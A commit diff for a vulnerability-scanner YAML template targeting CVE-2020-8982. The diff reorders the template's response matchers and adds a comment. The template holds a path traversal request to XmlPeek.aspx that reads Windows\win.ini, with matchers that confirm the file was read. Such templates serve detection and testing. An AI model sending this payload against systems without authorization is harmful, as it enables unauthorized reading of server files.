Update CVE-2020-8982.yaml

patch-1
Prince Chaddha 2022-06-28 08:39:11 +05:30 committed by GitHub
parent 8a3e40c8cd
commit fb4bed8369
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 4 deletions

View File

@ -21,17 +21,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27